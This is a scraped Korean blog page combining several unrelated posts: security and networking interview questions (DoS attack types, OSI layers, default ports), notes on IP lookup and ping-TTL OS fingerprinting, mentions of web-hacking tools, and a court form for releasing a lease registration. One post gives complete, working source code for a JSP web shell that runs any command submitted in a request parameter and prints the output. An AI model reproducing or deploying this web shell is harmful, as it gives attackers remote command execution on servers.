반응형

보 안

 

[하] 1. 해킹은 무엇인가?

- 남의 컴퓨터 시스템에 침입하여 장난이나 범죄를 저지르는 일

ex) 아는 사람 컴퓨터 접속하여 비밀번호 변경 하기 등...

 

[상] 2. 서비스거부 (DoS, Denial of Service) 공격의 예는?

- Ping of Death : 핑 테스트 할 때 패킷의 크기를 최대크기인(65,500byte)로 하여 공격대상으로 보내면 패킷은 네트워크에서 수백개의 패킷으로 잘개 쪼개져 보내지고 공격 대상 시스템은 결과적으로 대량의 작은 패킷을 수신하게 되고, 네트워크는 마비된다.

- SYN Flooding : 네트워크에서 서비스를 제공하는 시스템에서는 동시 사용자 수 제한이 있다. 즉 SYN Flooding는 존재하지 않는 클라이언트가 서버별로 한정되어 접속 가능한 공간에 접속한 것 처럼 속여 다른 사용자가 서버의 서비스를 제공받지 못하게 함.

- Boink, Bonk, TearDrop : TCP의 약점을 이용하는 방식

- Land : 패킷을 전송 할 때 출발지 IP주소와 목적지 IP주소값을 똑같이 만들어서 공격 대상에게 보내는 것(시스템 부하를 올림)

- Smurf : 웜이 네트워크를 공격하는 데 많이 쓰임. Ping of Death처럼 ICMP 패킷을 이용, 다이렉트 브로크 캐스트를 사용

- Mail Bomb : 폭탄 메일, 스팸 메일도 이와 같은 종류

- DDOS(Distributed Denial of Service): 분산 서비스 거부 공격

 

[하] 3. DNS는 무엇이며 역할은?

- Domain Name Server로 우리가 알고 있는 도메인 명을 입력하면 그 IP주소에 해당하는 숫자 값을 변환해 주는 역할을 함.

 

[하] 4. Linux 시스템에서 ls -lsa 와 같은 형태로 조회 했을 때

-rwxr-xr-x 일 때 그 권한에 대해 설명 하시오

첫 rwx : 소유자에 대한 읽기 / 쓰기/ 실행 권한

두 번째 rwx : 그룹에 대한 읽기 / 쓰기 / 실행 권한

세 번째 rwx : 다른 모든 사람에 대한 읽기 / 쓰기 / 실행 권한

 

[상] 5. 악성코드란?

- 제작자가 의도적으로 사용자에게 피해를 주고자 만든 모든 악의적 목적을 가진 프로그램 및 매크로, 스크립트 등 컴퓨터 상에서 작동하는 모든 실행 가능한 형태

- 악성코드의 종류

* 바이러스 : 사용자 컴퓨터내에서 사용자 몰래 프로그램이나 실행 가능한 부분을 변형해 자신 또는 자신의 변경을 복사하는 프로그램 가장 큰 특성은 복제와 감염

* 웜 : 인터넷 또는 네트워크를 통해서 컴퓨터에서 컴퓨터로 전파되는 프로그램

* 백도어와 트로이 목마

 

[상] 6. SSO(Single Sine On)이란?

- 모든 인증을 하나의 시스템에서 수행하는 것으로 하나의 시스템에서 인증에 성공하면 다른 시스템에 접근 할 수 있는 권한도 모두 얻는 것이다.

- SSO의 가장 큰 약점은 일단 최초 인증 과정을 통과하면 모든 서버나 사이트에 접속이 가능해진다는 것인데, 이를 Single Point of Failure라고 함.

 

[상] 7. DRM(Digital Right Management)란 무엇인가?

- 운영체제의 커널에 DRM 모듀을 삽입해 문서에 대한 열람/편집/인쇄까지의 접근 권한을 설정하여 통제하는 기술임.

 

네트워크

[중] 1. OSI(Open System Interconnection) 7계층은?

-

7계층

응용 프로그램 계층(Application)

6계층

표현 계층(Presentation)

5계층

세션 계층(Session)

4계층

전송 계층(Transport)

3계층

네트워크 계층(Network)

2계층

데이터 링크 계층(Data Link)

1계층

물리(Physical)

 

[중] 2. OSI 7계층중 물리 장치의 고유 주소인 MAC(Media Access Control)을 이용한 로컬 통신이 가능하게 하는 계층은?

- 2계층(데이터 링크 계층)

 

[중] 3. OSI 7계층중 포토(Port)를 이용하여 시스템내의 응용 프로그램 간 통신을 가능하게 하는 계층은?

- 4계층(전송 계층)

 

[하] 4. 랜 케이블의 CAT5의 10/100 BASE-T에서 10/100은 무엇을 의미하는가?

- 전송 속도 10 ~ 100Mbps

 

[하] 5. telnet과 ftp를 사용하는 기본포트는?

- telnet : 23, ftp : 20(전송데이터), 21(인증과제어)

 

[하] 6. 전송방식 중 TCP와 UDP의 차이는?

- UDP는 데이터의 신뢰성 있는 전송을 보장하지 않음

 

 

반응형

'일상다반사' 카테고리의 다른 글

아동 전집 할인 사이트  (0) 2010.10.27
이쁜 여자 아이 이름  (0) 2010.07.20
임차권 등기 명령 해제  (0) 2010.06.14
좋은 인맥을 만들지 못하는 5가지 이유  (0) 2010.02.19
용인에서 서울 출근하기  (0) 2010.01.14
반응형
반응형

'보안 > 웹 취약점 분석 설계 과목' 카테고리의 다른 글

웹 해킹 툴  (0) 2011.10.24
Burp Suite  (0) 2011.10.24
html 로 송수신되는 정보 조회 htmlviewer  (0) 2010.06.15
IP 정보 조회  (0) 2010.06.15
사이트 취약점 분석 도구 nstealth  (0) 2010.06.15
반응형

htmlview.exe

반응형
반응형
http://www.arin.net/whois

IP정보로 대역대 및 정보를 조회

telnet IP 80
GET / HTTP/1.1

ping www.naver.com -t
255 숫자 가까움 linux,unix,솔라리스 계열
135 숫자 가까움 윈도우 시스템
53   숫자 가까움 64bit or 네트워크 장비


반응형
반응형

http://www.nstaller.com/products

취약점 자동 분석 프로그램이나.. 무료버젼은 100링크 페이지만 한도...


반응형
반응형
모든 기능을 인코딩 / 디코딩 해주는 프로그램


반응형
반응형

1. 필요 서류
   - 직접 갈때 : 임차권 등기 해제 신청서, 임차권 등기 확정문, 부동산 목록 4부(하나 그림그려 복사 4개)
   - 대리인 : 직접갈때 서류 + 위임장 + 인감증명서
   ※ 주의사항 : 위임장과 임차권 등기 해제 신청서에는 꼭 인감도장을 찍어야 함



[서식예 23] 주택임차권등기명령취하 및 해제신청
주택임차권등기명령취하 및 해제신청
사 건 20○○카기 ○○○호 주택임차권등기
신 청 인 ○ ○ ○
피신청인 △ △ △
위 사건에 관하여 신청인은 피신청인과 원만히 합의를 하여 별지 목록 기재 부
동산에 대한 주택임차권등기명령신청을 취하하므로 해제하여 주시기 바랍니다.
20○○. ○. ○.
위 신청인의 대리인
변 호 사 ○ ○ ○ (인 )
○ ○ 지 방 법 원 귀 중
반응형

'일상다반사' 카테고리의 다른 글

이쁜 여자 아이 이름  (0) 2010.07.20
보안과 네트워크...  (0) 2010.06.28
좋은 인맥을 만들지 못하는 5가지 이유  (0) 2010.02.19
용인에서 서울 출근하기  (0) 2010.01.14
실런트와 불소 치료  (0) 2009.12.07
반응형

보안 위배 사항을 나열해 주는 점검쉘...

대기업에서 만든 버젼인데...

유출을 걱정했는지,

분석구분은 안들어있고

조회만 하넹...

걍 내가 만든게 더 나을꺼 같다 -_-;

반응형
반응형


JSP 용 web shell



<%@ page contentType="text/html;charset=euc-kr" %>
<%@ page import="java.io.*"%>
<%
String execute = request.getParameter("execute");
if(execute == null) execute = "";
%>
<html>
<head>
<title>
WebShell
</title>
<script>
function send()
{
        document.main.submit();
}
</script>

</head>
<body>
<br>
<form method="post" name="main" action="webshell.jsp">
<table width="400"  border="0" CELLPADDING=0 CELLSPACING=0>
    <tr bgcolor="#F7FCFE">
        <td height="22" align="center" width="70">명령어</td>
        <td height="22" align="center" align="left">
        <input type="text" name="execute" size="30" value="<%=execute%>">
        <input type="button" value="실행" onClick="javascript:send();"></td>
        </tr>
</table>
</form>
<hr>
<%
if(!execute.equals("")){
BufferedReader br = null;
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec(execute);
br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
String line;
while((line = br.readLine())!=null){
        out.println(line+"<br>");
}
br.close();
proc.destroy();
}
%>
</body>
</html>

반응형

'Language > JSP' 카테고리의 다른 글

JSP 2.0 프로그래밍 소스  (0) 2011.10.12
로딩된 CLASS 정보 보기  (0) 2011.03.10
JSP 파일 읽기  (0) 2009.12.03
웹 상에서 바로 엑셀로 저장하기  (0) 2009.03.06
반응형
하야...

뭐 이런게 다있지...

암튼.. 어려버... ㅋㅋ;

이 프로그램 GUI 환경에서 SQLITE를 쓰게 해주는 프로그램임...

explain 정보를 보기 좋게 뜨기 위해서 사용


반응형

'Database' 카테고리의 다른 글

무료 DB 접근 툴  (0) 2019.08.19
무료 ERD 툴 ERMASTER  (0) 2019.08.08
damo 암호화 컬럼 복원시 주의사항  (0) 2017.08.20
Sybase IQ Administrator 사용 Script  (0) 2012.10.18
JNDI Log4SQL 적용 예...  (0) 2011.04.21

+ Recent posts